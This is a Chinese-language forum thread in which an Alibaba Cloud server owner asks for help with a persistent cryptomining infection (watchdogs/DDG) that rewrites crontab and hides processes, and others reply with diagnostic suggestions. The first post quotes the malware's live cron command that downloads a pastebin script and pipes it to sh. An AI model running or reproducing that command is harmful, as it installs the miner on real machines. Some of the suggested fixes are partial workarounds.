首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  信息安全

阿里云服务器被挂马,被写入 crontab 删不掉。ps 命令找不到 nginx PHP 进程信息

  •  
  •   hobbyliu · 264 天前 · 3890 次点击
    这是一个创建于 264 天前的主题,其中的信息可能已经有所发展或是发生改变。

    */15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh

    crontab 被写入这段代码。删除后一会又自动加上。

    ps 命令看到的进程很奇怪,php nginx 进程找你不到了,但是服务正常。

    怀疑 ps 被修改, 已经从其他服务器替换了回来,但是依旧不行。

    26 回复  |  直到 2019-02-26 13:34:52 +08:00
        1
    ThirdFlame   264 天前
    可能不止 PS 被替换了啊
    watchdogs 还在运行呢。
        2
    dapang1221   264 天前
    alias,查一下是不是 ps 被设置别名,把奇怪的进程 grep 掉了
        3
    hcymk2   264 天前   ♥ 1
        4
    cpdyj0   264 天前 via Android
    检查下内核模块,有没有什么奇怪的东西
        5
    huixia0010   264 天前
    有 memcache 吗~有的话,关掉试试~
        6
    allenhu   264 天前
    @cpdyj0 好像很有道理,但是怎么检查?
        7
    rogerchen   264 天前 via iPhone
    重置吧,手工不能打过 rootkit 的
        8
    hobbyliu   264 天前
    @huixia0010 并没有,只有 redis 怀疑是 redis 注入 shell 但是,redis 进程号找不到。。ps 命令不好使了
        9
    greatbody   264 天前
    用 terraform 来管理基础设置,然后把服务全部都用容器。最后,数据库什么的都用云数据库。

    应该会好很多。
        10
    ThirdFlame   264 天前
    @hobbyliu ps ls 可能都被替换了。
        11
    c0878   264 天前
    保存数据 重装系统
    另外阿里云态势感知可以用一下
        12
    changliwei   264 天前
    可以实时 csysdiag 程序查看,
    sysdig 这个工具的原理不是读取 /proc/的统计值,通过加载一个内核模块,对内核插入各种探测点,动态采集原始数据,再进行分析,恶意软件的隐身原理对 sysdig 不适用了.

    top/iotop/lsof/netstat /ps 等工具都是 /proc 下内核统计值工作的工具,很容易被恶意软件的隐藏没法查看。

    安装 csysdiag 就可以查看,centos
    curl -s https://s3.amazonaws.com/download.draios.com/stable/install-sysdig | sudo bash


    Viewing: Processes For: whole machine
    Source: Live System Filter: evt.type!=switch
    PID CPU USER TH VIRT RES FILE NET Command
    4101 100.00 1 317M 5M 0 0.00 <NA>
    1012 4.00 root 1 118M 19M 0 0.00 csysdig
    30087 0.50 1 4G 3G 0 0.00 <NA>
    30084 0.50 1 4G 3G 0 0.00 <NA>
    29063 0.50 1 3G 2G 0 0.00 <NA>
    9387 0.50 1 4G 3G 0 0.00 <NA>
    4058 0.50 1 108M 40M 0 1.69K <NA>




    [[email protected] ]# ls -l /prox/4101
    total 0
    dr-xr-xr-x 2 root root 0 Feb 21 18:43 attr
    -rw-r--r-- 1 root root 0 Feb 21 18:43 autogroup
    -r-------- 1 root root 0 Feb 21 18:43 auxv
    -r--r--r-- 1 root root 0 Feb 21 18:43 cgroup
    --w------- 1 root root 0 Feb 21 18:43 clear_refs
    -r--r--r-- 1 root root 0 Feb 21 18:43 cmdline
    -rw-r--r-- 1 root root 0 Feb 21 18:43 comm
    -rw-r--r-- 1 root root 0 Feb 21 18:43 coredump_filter
    -r--r--r-- 1 root root 0 Feb 21 18:43 cpuset
    lrwxrwxrwx 1 root root 0 Feb 21 18:43 cwd -> /
    -r-------- 1 root root 0 Feb 21 18:43 environ
    lrwxrwxrwx 1 root root 0 Feb 21 18:43 exe -> /tmp/ksoftirqds (deleted)
        13
    hobbyliu   263 天前
    @changliwei 试了一下,还是进程缺失,php nginx 进程还是看不到
    [![kWlAxJ.md.png]( https://s2.ax1x.com/2019/02/21/kWlAxJ.md.png)]( https://imgchr.com/i/kWlAxJ)
        14
    Acoffice   263 天前 via Android
    今天上午也有个同事问这个问题,楼主如果解决,麻烦贴出解决方案哦
        15
    Acoffice   263 天前 via Android
    链接点进去解密可以看到定时任务都执行了什么
        16
    Acoffice   263 天前 via Android
    太长,我就不往上贴了
        17
    Acoffice   263 天前 via Android
    简单分析了下,
    解决点:卸载 curl 命令,然后删除 cron,kill 掉 nohup /tmp/watchdogs >/dev/null 2>&1 进程,
    然后再细看解密后都执行了哪些命令,挨个恢复.
        18
    abcbuzhiming   263 天前
    兄弟,我和你症状一模一样啊
    https://www.v2ex.com/t/537457
        19
    hobbyliu   263 天前
    @Acoffice 我更改了下 host 127.0.0.1 pastebin.com 基本控制住了,但是没有根治啊。找阿里云客服说也没办法让备份恢复系统盘解决。
        20
    sdksang   263 天前
    大兄弟 中了 DDG 啊 。。
        21
    hobbyliu   263 天前
    @sdksang ddg 的变异,用处理的 ddg 的方法根本处理不了。
        22
    hyshuang2006   262 天前
    哎...我的 VPS 惨了,连 root 都进不去。
        23
    hobbyliu   262 天前
    @hyshuang2006 你设置的不允许密码登录?
        24
    hyshuang2006   262 天前
    @hobbyliu 对啊,密钥登陆。原来密钥登陆也存在隐患。唉...

    不过也是好事情,这回找时间充电,认真对待:补写脚本及安全方面。
        25
    metas   259 天前
    应该是被被植入了 watchdogs 挖矿病毒,楼主可以看看腾讯安全云鼎实验室的清理方式:

    https://mp.weixin.qq.com/s/3V0HVEREZWU8SkRWLspaxg
        26
    hobbyliu   259 天前
    @metas 感谢 我研究下
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2695 人在线   最高记录 5043   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 28ms · UTC 12:51 · PVG 20:51 · LAX 04:51 · JFK 07:51
    ♥ Do have faith in what you're doing.